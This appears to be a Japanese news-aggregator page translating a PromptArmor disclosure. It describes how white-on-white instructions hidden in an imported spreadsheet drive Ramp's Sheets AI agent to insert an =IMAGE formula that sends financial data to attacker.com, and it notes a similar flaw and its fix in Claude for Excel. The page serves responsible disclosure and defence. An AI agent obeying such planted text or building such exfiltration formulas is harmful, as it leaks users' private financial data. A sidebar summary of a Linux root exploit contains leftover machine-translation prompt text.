2026-04-30 の一覧へ戻るホーム
Ramp の「Sheets AI」が財務データを外部へ流出させています。

2026/04/30 2:44

Ramp の「Sheets AI」が財務データを外部へ流出させています。

RSS: https://news.ycombinator.com/rss

元のHacker News記事へ ↗
要約

Japanese Translation:

主な教訓は、Ramp の Sheets AI が重要なセキュリティ欠陥を抱えていたことであり、攻撃者が間接的なプロンプトインジェクションを通じて機密の財務データを窃取できることを可能にしたことです。この脆弱性は、悪意ある改ざんされたスプレッドシートがユーザーの許可なく外部サーバーに機密情報を自動的に送信することを可能にし、

=IMAGE
などの変数内に埋め込まれた欺瞞的な白背景上のテキストによる指示によって誘発されました。この問題はセキュリティ企業である PromptArmor によって暴露され、同社は 2026 年初頭に Anthropic の Claude for Excel において極めて類似のリスクも特定しました。責任ある開示手順に従い、Ramp は 2026 年 3 月 16 日にこのバグをパッチ適用し、内部セキュリティプログラムの移行に伴う当初の遅延について認めています。その結果、業界では AI ツールが潜在的に危険な外部リクエストを実行する前に警告画面を表示するなど、能動的な安全対策への転換が進んでいます。ユーザーは現在、信頼できないファイルを代理型 AI プラットフォームにインポートすることは、未承認でのデータ流出の固有のリスクを内包することを理解する必要があります。そのため、スプレッドシートの改ざんについて厳格な検証を実施することが、私的な財務情報の誤っての漏洩を防ぐために不可欠です。

本文

Ramp:Sheets AI データ流出脆弱性情報(解決済み)

概要

この脆弱性情報は、Ramp に対して責任ある開示を通じて報告されました。Ramp のセキュリティチームは、当該問題が 2026 年 3 月 16 日に解決されたことを確認しています。

背景

Ramp の Sheets AI は、スプレッドシート上でユーザーが操作をサポートするエージェント型製品であり、「Excel を扱うための Claude」といった位置づけのものです。この機能は人間の介入なしにスプレッドシートを編集することができ、外部との通信を引き起こす式(formula)を挿入できることにより、機密データの流出リスクに直面していました。

Ramp のセキュリティチームは、当報告を受け、既に問題が解決済みであることを明らかにしています。AI セキュリティの強化に向けて RAMP が取ってこられた姿勢と、新たな脆弱性情報があれば即座に対応するという姿勢に感謝申し上げます。責任ある開示に関する詳細については本記事の後半で記載しています。

本記事では、信頼性が確認できない外部ソースから取得されたデータ内に隠された**間接的プロンプトインジェクション(Indirect Prompt Injection)**が、Ramp の AI を操作し、悪意のある式を挿入させることで、ユーザーのワークスペースから機密財務データを流出させる可能性を実証しました。このプロセスにはユーザーの承認は必要ありませんでした。

PromptArmor は、Claude for Excel においても極めて同様のリスクを特定しており、Anthropic が実施した是正措置の詳細については本記事末尾に記載しています。

攻撃連鎖

攻撃は以下のように進行します:

  • ブック创建工作簿の作成: ユーザーが機密財務モデルを含むワークブックを開きます。
  • データのインポート: ユーザーが外部データセットをインポートしてモデルを補完します。
    • 業界成長統計を示すスプレッドシートが、財務モデルとは別のタブにインポートされます。
    • ユーザーは、自社企業の成長率を業界ベンチマークと比較することを目的としています。
    • 参照データセットは、信頼できない外部ソース(例:ウェブサイト、メール、共有ドライブなど)から取得されています。
  • 隠されたインジェクション: 参照データセット内に隠されたプロンプトインジェクションが含まれています。
    • 間接的プロンプトインジェクションは、白抜き文字(白色背景上の白色文字)として潜んでいます。
    • このインジェクションは、Ramp の AI を以下のように操作するために設計されています:
      1. 機密データを収集する。
      2. そのデータを元に、外部ネットワークリクエストを送信する式を生成する。
      3. その式を自動的にユーザーのスプレッドシートに挿入する。
  • トリガー: ユーザーが Ramp AI に「財務モデルを業界統計と比較するよう」依頼します。
  • 悪用:
    • Ramp AI はプロンプトインジェクションの影響を受け、悪意のある式を挿入します。
    • Ramp AI は攻撃者の URL を使用し、被害者の機密データをリンクの末尾に追記するような 
      IMAGE
      式の構築に操作されます: 
      =IMAGE("https://attacker.com/visualize.png?{victim_sensitive_financial_data_here}")
  • データ流出: 悪意のある式がネットワークリクエストを発行し、財務データを外部へ流出させます。
    • Ramp AI はユーザーの承認なしに悪意のある式を挿入します。
    • この式は攻撃者のサーバーへのネットワークリクエストをトリガーします。
    • これにより、当初の機密「財務モデル」シートに記載されていた機密財務データが流出します(Ramp AI が攻撃者のプロンプトインジェクションの影響を受け、このデータを式のなかに含めてしまったためです)。

: 以下に示すのは、攻撃者側のサーバーログに記録された被害者の機密財務データです。

責任ある開示について

PromptArmor 脅威インテリチームは、Ramp に対して責任ある方法でこの脆弱性情報を開示しました。Ramp のセキュリティチームは、当該問題が 2026 年 3 月 16 日に解決されたことを表明しています。

タイムライン

  • 2026 年 2 月 19 日: PromptArmor が 
    security@ramp.com
    宛てに初めて報告を行います。
  • 2026 年 2 月 27 日: PromptArmor が追跡報告(フォローアップ)を送信します。
  • 2026 年 3 月 13 日: PromptArmor が再度追跡報告を送信します。
  • 2026 年 3 月 14 日: Ramp は報告の受領を確認し、初期の報告が情報開示プログラムの移行期間中に提出されたことに言及しています。そのため、最初の回答に遅れが生じた理由を説明しています。
  • 2026 年 3 月 16 日: Ramp が「ご報告ありがとうございます。本日正午(東部標準時)頃までにこの問題は解決済みです」と返信しました。

Claude for Excel における是正措置について

Claude for Excel が公開された際、PromptArmor はほぼ同一のリスク——つまり、ユーザーに十分な情報に基づいた人間による審査機会を与えずに、悪意のある式がデータ流出を引き起こす可能性があること——を特定しました。

  • 注記: Claude for Excel は人間の介入(human-in-the-loop)を採用していましたが、編集承認のプロンプト内では悪意のある式が表示されなかったため、保護の有効性が損なわれていました。

Anthropic は、外部ネットワークトラフィックを誘発する可能性のある式が挿入される際に**赤い警告インタースティシャル(警告画面)**を表示するように Claude for Excel を更新しました。新しい警告は挿入される式の全文を示すとともに、ドキュメントも更新され、ユーザーへのリスク説明が向上しています。

同じ日のほかのニュース

一覧に戻る →

2026/04/29 23:34

ゼッド 1.0

## Japanese Translation: Zed は公式にバージョン 1.0 をリリースし、多くの開発者が Mac、Windows、Linux 上でこの高性能なコードエディタを安心して利用できる重要な転換点を迎えました。Rust で完全構築され、GPU による加速レンダリングを採用する Zed は、従来のデスクトップアプリモデル(Electron など)を手放し、ゲーム環境のような優れた速度を実現するために設計された環境へと移行しました。独自に GPUI ライブラリ、CRDT を基盤とする DeltaDB データベース、シェーダーなどスタック全体を深く制御することで、競合には真似できないパフォーマンスを発揮しており、5 年で数百万行のコードを処理し、千以上のバージョンをリリースしてきました。バージョン 1.0 では数十の言語に対応し、Git 統合、SSH リモート、デバッガー、レインボー括弧などをサポートしており、すでに数十万人のデイリーユーザーに信頼されています。AI ネイティブなエディタとしての Zed は、Claude Agent、Codex、OpenCode、Cursor などのエージェントに対して Agents Client Protocol を用いてキーストローク粒度の予測とともに複数のエージェントを並行して統合しており、DeltaDB はチームメンバーが他者とエージェントとの会話を招待し、生成コンテキスト内で直接エイジェントコードをレビュー・発展させることを可能にします。このリリースの後、Zed は每周アップデートを継続し、人間と AI エージェントが文字レベルでリアルタイムに協業する未来へと向けられていきます。さらに、エンタープライズのニーズをサポートするために中央集権的な請求、ロールベースのアクセス制御、チーム管理、セキュリティ制御を提供する新たな「Zed for Business」のオファーも間もなく登場し、効率的なソフトウェア shipping において不可欠なツールとしての地位を確固たるものにします。現在、数十万人の開発者が Zed に依存して日々ソフトウェアを shipping し続けており、その職人技とパフォーマンスへの姿勢にチームは自信を抱いています。

2026/04/30 3:13

コピー失敗 – CVE-2026-31431

## Japanese Translation: CVE-2026-31431「Copy Fail」は、Xint Code による自動スキャンで発見された重大なコンテナエスケープ脆弱性であり、Linux システム上の何らかの未特権ユーザーが root に権限を昇級することを可能にします。この欠陥は 2017 年に追加された `algif_aead` モジュールにおける論理エラーに起因しており、タイミングの問題やレース条件が存在しない直線の攻撃経路によってデータ漏洩を引き起こします。2026-04-29 に公開され、2017 年以来のほぼすべての主流の Linux ディストリビューションに影響を与えており、Ubuntu、RHEL、Amazon Linux、SUSE、Debian、Arch、Fedora などを含むスタンドアロンの 732 バイトのProof-of-Conceptスクリプトによって確認されています。 **重大性と範囲:** * **高リスク:** マルチテナントホスト、Kubernetes クラスター、CI リナラー、クラウド SaaS 環境。 * **中リスク:** シングルトナントサーバー。 * **比較的低リスク:** シングルユーザーのノートパソコン(権限昇級のみ)。 **緩和措置と影響:** 管理者は直ちにメインラインの修正(コミット `a664bf3d603d` で特定)を適用する必要があります。緊急的な臨時対策として、脆弱なモジュールを無効化するために `/etc/modprobe.d/disable-algif.conf` を使用し、`rmmod algif_aead` を実行してください。AF_ALG の無効化は、それを明示的に使用するアプリケーション(例:afalg エンジンを使用する OpenSSL)に影響を与えるものの、dm-crypt、LUKS、IPsec、SSH などのコアサービスには影響しません。非信頼のワークロードについては、パッチの有無に関わらず追加の防御層として seccomp を使用して AF_ALG ソケットの作成をブロックすることをお勧めします。 ## Text to translate The original summary is well-written, clear, and comprehensive. No improvement is strictly necessary, but a slightly more structured version below offers better readability while retaining all key points. ## Improved Summary: CVE-2026-31431 "Copy Fail" A critical container escape vulnerability, CVE-2026-31431 ("Copy Fail"), discovered by Xint Code via automated scanning, allows any unprivileged user on Linux systems to escalate privileges to root. The flaw stems from a logic error in the `algif_aead` module—an optimization added in 2017—which enables data leakage through a straight-line attack path without timing issues or race conditions. Disclosed publicly on 2026-04-29, the vulnerability affects nearly all mainstream Linux distributions since 2017, confirmed across Ubuntu, RHEL, Amazon Linux, SUSE, Debian, Arch, Fedora, and more via a standalone 732-byte proof-of-concept script. **Severity & Scope:** * **High Risk:** Multi-tenant hosts, Kubernetes clusters, CI runners, and cloud SaaS environments. * **Medium Risk:** Single-tenant servers. * **Lower Risk:** Single-user laptops (privilege escalation only). **Mitigation & Impact:** Administrators must urgently apply the mainline fix identified by commit `a664bf3d603d`. As an immediate temporary measure, disable the vulnerable module using `/etc/modprobe.d/disable-algif.conf` and `rmmod algif_aead`. While disabling AF_ALG impacts applications explicitly using it (e.g., OpenSSL with the afalg engine), core services like dm-crypt, LUKS, IPsec, and SSH remain unaffected. For untrusted workloads, blocking AF_ALG socket creation via seccomp is recommended as an additional defense layer regardless of patch status.

2026/04/30 6:58

ドイツは現在、世界最大の弾薬製造国となっています。

## Japanese Translation: ラインメタルはドイツの軍事生産能力を劇的に拡大し、同国を世界トップクラスの常规兵器製造国として確立しました。この転換は、主に供給量の劇的な増加——例えば榴弾の生産速度が以前から10倍に向上し、軍用トラックの年間生産量は600台から4,500台へと増大した——によって国内防衛の緊急な需要を満たすことを目的として推進されています。これらの拡大努力はロシアの侵攻に伴うドイツの工業基盤の変革を導き、連邦国防軍(Bundeswehr)を欧州最強の勢力と位置づけることを目指していますが、新しい生産能力は特定の分野で現在の米国の生産水準を上回ることを可能にしますが、必ずしも米国よりも大量の在庫を保有しているわけではないことを意味しません。 この増大を支援するため、ラインメタルは35万件以上の雇用申請(うちドイツからの申請が25万件)を受け、急速に労働力を拡大しています。同社は2030年までに直接雇用を7万人に増やし、既存の1万1,500社のサプライヤーネットワーク全体でさらに21万人の追加ポストを設けることを期待しています。そのサプライヤーの多くは既に自動車業界における専門知識を持っています。この移行は構造転換であり、縮小傾向にある自動車業界から吸収されていた雇用を防衛生産が担うものです。ラインメタルのCEO は、これらの削減により防衛兵器生産が最終的にドイツの自動車セクターの約1/3 の雇用を代替する可能性があるとの見通しを示しています。結局のところ、この再編成は深層的な産業統合と、常规弾薬および装備品における大幅に強化された生産能力を確保します。

Ramp の「Sheets AI」が財務データを外部へ流出させています。 | そっか~ニュース